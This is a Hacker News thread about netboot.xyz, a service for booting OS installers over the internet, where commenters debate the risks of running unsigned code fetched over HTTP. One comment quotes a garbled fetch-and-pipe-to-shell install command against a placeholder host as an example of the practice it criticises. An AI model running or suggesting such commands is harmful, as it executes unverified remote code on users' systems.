Hacker News new | past | comments | ask | show | jobs | submit login
Netboot (netboot.xyz)
214 points by p4bl0 on Jan 18, 2016 | hide | past | favorite | 44 comments



NetBooting from the internet AND over HTTP? Sign me up!

Sarcasm aside, at the very least it would have been nice to see it use iPXE's `imgtrust` and `imgverify` functionality, which I could then audit and load on to a boot medium for netboot use.


For any naysayers, there's no difference between this project and say Hashicorps' images. You're either using upstream, or you're not. But yeah, you probably want a cert.

To be honest, this looks like a cool project. I've always wanted a way to PXE without having to need another host on the LAN.


>at the very least it would have been nice to see it use iPXE's `imgtrust` and `imgverify` functionality

I'm not familiar with these but I saw a commit from just a couple of hours ago referencing "image trust" [1], so maybe it's in the works now following your comment?

[1]: https://github.com/antonym/netboot.xyz/commit/25910be18da219...


Running unsigned code from the internet? Have I woken up in crazy land today? When did things like this become acceptable.


Run:

sh | wget http://www...something.com/install.sh

to install something automatically! Way too many projects do it, from my head: rvm and oh-my-zsh.


I think it's the other way and you need the -qO- flags.


The problem with this is that the bootloader downloads and runs the code without giving any chance to inspect it.

If you download the code manually, how are you to know that the server sent you the exact same code? They could be checking HTTP headers for a bootloader device, or might only be infecting 1 in 100 downloads. You'd never spot it.


You can always examine the code right? https://github.com/antonym/netboot.xyz/blob/master/src/coreo... Uses official images as far as I can see


Sure, you could compile it yourself, then host it yourself. Relying on the remote server is the problematic part.


I see. Correct.


Don't forget that many require you to use sudo.


zsh: command not found: sudo


No worse than "./configure && make && sudo make install"


It's a bit different though. autoconf/automake is mostly autogenerated and will prevent silly issues like accidental wiping of your drive (https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issue...). Released packages will often have hashes either on the website or as additional download. With git you can verify tags (provided they're signed). You can compile&test package inside chroot before installing. Etc. etc.

In theory, yes, `curl | sh` is the same as configure&make is the same as downloading your initial iso image and installing the system from it. In practice they have different risks associated with them.


Sure, autoconf is generated, but often develops have to add custom rules.. and do it with arcane m4 macros to boot. I think they're similarly prone to mistakes.

For nefarious purposes I actually think it's worse than the much-maligned "curl|sh" scenario. I bet a reasonable number of people will end up trying to download the script, out of curiosity if nothing else. If it's doing anything not straightforward, it would get attention. In contrast, who would notice a line added to the middle of a 8000 line auto-generated configure script?


That wasn't my point. configure doesn't prevent malicious behaviour, but it would prevent silly mistakes at install time. (unless you actively break out of macro environment)

The point is, technically there isn't anything different between `curl | sh` and installing a system from either a downloaded .iso or a mailed DVD. Both run code from untrusted sources on your computer. But in practice they're very different because of user behaviour and ability to validate data before running. There's a whole spectrum in between and configure&make is somewhere on it.


What about AUR from ArchLinux? It's similar, but it also has different risks, Vidalia/Tor-git maintainers change quite often, users are forced to add new GPG keys, but it downloads src from git (quite often).

What about `cd /usr/ports/www/firefox && make clean install`?


If that's being run for code you've downloaded from an untrusted location, then I'd agree with you. However, almost every project that has those instructions starts with "download it from this trusted location, verify its integrity using this GPG key...".

Of course, you have to start trusting at some point. But with HTTP, you have to also trust the wifi AP, its owner, all of the routers between you and the server, DNS... At least https takes a lot of those (but not all) out of the equation, while GPG goes even further.


docker?


curlpipesh.tumblr.com/


People are running untrused code all the time. How uses a 100% open source, repoducably build, 100% audited os?


The problem is that this is going over the intenet. If you haven't seen what kind of problems this can cause, you should look at moxie sslstrip talk from defcon. The problem arises when other people want root access to your system and they can now get it from a VERY simple man in the middle.

Running untrusted code is one thing, running it after pulling it from the internet is an ENTIRELY different subject.


All my apt-get downloads go over the internet. All my install isos.

People download third party docker contains. I can't see how this is worse.


I had the exact same reaction (and friends over IRC too), but I still find the idea quite cool: it could be implemented correctly (with signature verification or something alike).

Also, if it is just to try out a new OS in a virtual machine, I guess it is okay to use such a service :).


Yes, but you would probably want to have a local copy of all public keys for the OSs for verification, it would have to go over HTTPS, and You would likely need some signature validation.

The idea is really cool, specifically I'd use this for the raspberry pi. I hope someone does some major security maintenance on this


Netbooting isn't new. Insecure netbooting isn't new (ala netboot install USB's per distro). Wrapping it up into a cohesive service is and it's awesome.

Going signed CA wouldn't be hard to do in this case at all, it's just part of the build process actually but only gets you to to a trusted PXE+menu system. After getting into the PXE menu a system could still hijack the upstream kernel/initrd files.

Even freebsd netinstall (aka not limited to linux installers) is just http/ftp without any package signing. The whole ecosystem probably needs to mature some more in regards to verification that won't break downstream projects such as this.


After boot.kernel.org and netboot.me seem dead now i like to see this kind of thing available again. I acknowledge the threat of downloading these boot images over the internet but think it is actually not that much different from downloading the iso... from the internet. Sure, i could verify the image more easily but i barely did this in the past. However the ability to verify the the images would be nice though.


Dev here. The project is just a bunch of iPXE scripts that understands how each distro works and routes you to their hosted bits or a trusted mirror once you select the image. I've tried to keep all of the code on Github and the Travis CI deployment out in the open for that very reason. A project like this needs to be highly visible in order to be trusted to a degree. I also have things like image verification and https support on the list of things to do.


Combining this with IPFS.io would be interesting. See https://github.com/zignig/astralboot


I'm happy to see the PXE booting scene get a new revival. It's one of those crucial services that's often neglected. It's also not a very "sexy" place to do development in, but boy it's good to see a proper tool emerge.

Fyi, I first heard about Netboot via the cron.weekly newsletter last Sunday, it seems to be a very new project that's only just been released: http://www.cronweekly.com/issue-11/


A short idea after seeing some people complaining about the security. Wouldn't it be possible to host the IPXE scripts itself on gh-pages? That way the hosting would be complete transparent and the .github.io domain would work over SSL


Archlinux does the same thing for their releases.

https://releng.archlinux.org/pxeboot/


This is very cool and very useful to me as I'm currently in the process of rebuilding our infrastructure (working on OpenBSD autoinstalls at the moment). I'm gonna test this out very shortly although I'll be using it internally and not over the Internet (for what should be obvious reasons), but it will definitely simplify things for me. Thanks!


Looks similar to boot.rackspace.com.


Yeah, I originally wrote boot.rackspace.com. I built netboot.xyz based on a lot of that original code, expanded what Operating Systems and Utilities it supported, and wanted to make it a more open project for everyone to take advantage of.


Looks like the author works for Rackspace so it may be related.


This is a really neat idea security concerns aside. I have about 5 minutes USB drives laying around with various OS versions. Sometimes I just want to you with something (such as mint Linux) and this kind of thing is ideal! Thanks dev, great work!


The only thing I get from xyz domains is spam and viruses (I didn't click the link).


It is just a TLD, dude. Doesn't mean anything.


It means much: who is operating it and under which jurisdiction.


I've seen more legitimate users of .xyz than of .biz (which pre-New GTLDs was the go-to TLD for general awfulness...)



Sounds great


Thanks




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: